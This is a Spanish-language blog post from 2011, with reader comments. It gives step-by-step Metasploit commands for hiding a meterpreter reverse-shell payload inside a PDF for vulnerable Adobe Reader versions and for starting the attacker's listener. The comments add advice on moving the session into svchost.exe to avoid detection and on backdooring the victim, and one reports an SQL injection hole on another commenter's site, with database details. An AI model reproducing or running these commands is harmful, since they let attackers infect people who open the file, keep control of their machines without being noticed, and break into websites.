20 mar 2011

[Video Metasploit] Infectar PDF

Vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:




Aquí está el comando y entre corchetes [] la explicación:
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploit

Ya le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit

[+] Pruben con sus maquinas virtueles ;)
[+] Salu2
[+] ZioneR

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

8 Notaciones:

  1. Seria muy interesante y espero que si se pueda "infectar" un pdf que ya existe y no "crear" un pdf que si infectado pero vacio, seria algo obio creo.

    a hacer pruebas! y gracias por el aporte ZioneR :)

    ResponderEliminar
  2. @»AngelitX«: En efecto puedes infectar un pdf que ya existe, con "set INFILENAME" elegimos el pdf que infectaremos, si omitimos "set INFILENAME" se creará un archivo en blanco pero con el PAYLOAD dentro.

    [+] ZioneR

    ResponderEliminar
  3. Una pregunta, la infeccion se hace en el PDF .. significa eso que si la victima cierra el pdf se pierde la sesion de meterpreter??

    Habria que migrar el proceso al explorer lo mas rapido posible no ? O no seria necesario ? Cuanto dura la infeccion, por que persistente no es, que sabes de esto.

    PD: Enhorabuena por el blog :)

    ResponderEliminar
  4. @Anónimo: Viejo, tengo entendido que automáticamente el proceso se migra a notepad.exe así que si cierra el PDF seguiría la session activa, pero siempre es recomendado migrar el proceso a uno de sistema o uno difícil de detectar (ex. svchost.exe)...

    Por lo demás la session no es persistente, si es cerrado el proceso o si es reiniciado el PC, la session se cierra. Pero puedes troyanizar, backdoorizar, activar el escritorio remoto, VNC...

    [+] ZioneR

    ResponderEliminar
  5. Este comentario ha sido eliminado por un administrador del blog.

    ResponderEliminar
  6. Muy buen post. Yo solo sabia hacer ataques de denagación de servicios.

    Saludos,


    Amy Torsion

    ResponderEliminar
  7. @Todo pasa por una razon:
    Viejo, la URL que posteaste, no sé si por spam o que... Esta horrorosamente vulnerable a SQLi
    DB 1: tienda
    information_schema.tables ACTIVADO!
    57 Tablas incluyendo la del admin, y la contraseña ni siquiera está encriptada, realmente necesita una mano el webmaster de esa web :(

    ResponderEliminar
  8. Panda corriendo sobre windows 7 detecta el script cuando se ejecuta. Aún asi... muy interesante.

    Ron.

    ResponderEliminar

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.